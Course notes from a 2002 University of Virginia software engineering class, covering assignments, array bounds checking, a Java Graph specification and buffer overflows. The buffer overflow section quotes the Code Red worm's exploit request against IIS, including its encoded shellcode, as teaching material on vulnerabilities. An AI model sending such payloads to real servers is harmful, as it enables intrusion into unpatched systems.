University of Virginia, Department of Computer Science CS201J: Engineering Software, Fall 2002

Notes: Thursday 12 September 2002
 Assignments Due

• 12 September: Read Ch 5.3-5.10
• 19 September: Problem Set 3
• Upcoming lab hours: (Small Hall): Thursday, 5-7pm (Sol); 7-9pm (Tiffany); Sunday 4-6pm (Mike); Monday 6-8pm (Serge); Wednesday (18 Sept), 5-7pm (Sol); Wednesday (18 Sept), 8-9pm (Tiffany).
Notes and Questions

What are the advantages and disadvantages of each approach to array bounds errors:

• No checking (C)

• Run-time checking (Java)

• Static checking (ESC/Java)

Graph Data Abstraction

In class Tuesday, we will work on implementing a Graph data abstraction that satisfies this specification:

```public class Graph {
// OVERVIEW:
//      A Graph is a mutable type that represents an undirected
//      graph.  It consists of nodes that are named by Strings,
//      and edges that connect a pair of nodes.
//      A typical Graph is: < Nodes, Edges >
//       where
//         Nodes = { n1, n2, , nm }
//       and
//         Edges = { {from_1, to_1}, , {from_n, to_n} }

// Creator
public Graph ()
// EFFECTS: Initializes this to a graph
//      with no nodes or edges: < {}, {} >.

// Mutators
// REQUIRES: name is not the name of a node in this
//  MODIFIES: this
// EFFECTS: adds a node named name to this:
//     this_post = < this_pre.nodes U { name }, this_pre.edges >

public void addEdge (String fnode, String tnode)
// REQUIRES: fnode and tnode are names of nodes in this.
// MODIFIES: this
// EFFECTS: Adds an edge from fnode to tnode to this:
//       this_post = < this_pre.nodes, this_pre.edges U { {fnode, tnode} } >

// Observers
public boolean hasNode (String node)
// EFFECTS: Returns true iff node is a node in this.

public StringIterator nodes ()
// EFFECTS: Returns the StringIterator that
//      yields all nodes in this in arbitrary order.

StringSet getNeighbors (String node)
// REQUIRES: node is a node in this
// EFFECTS: Returns the StringSet consisting of all nodes in this
//      that are directly connected to node:
//         \result =  { n | {node, n} is in this.edges }
}
```
Buffer Overflows
• CAIDA Analysis of Code Red
• CERT Advisory. The request that exploits the buffer overflow vulnerability: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
• Smashing the Stack for Fun and Profit, Aleph One
• Improving Security Using Extensible Lightweight Static Analysis (David Evans and David Larochelle), IEEE Software, Jan/Feb 2002.

Run-Time Exceptions

• Reports on the Ariane 5 run-time exception: Lions Report (official inquiry), Jean-Marc Jiziquel and Bertrand Meyer Stephen Marshall (include video of explosion)

Our recommendation now is the same as our recommendation a month ago, if you haven't patched your software, do so now.

Scott Culp, security program manager for Microsoft's security response center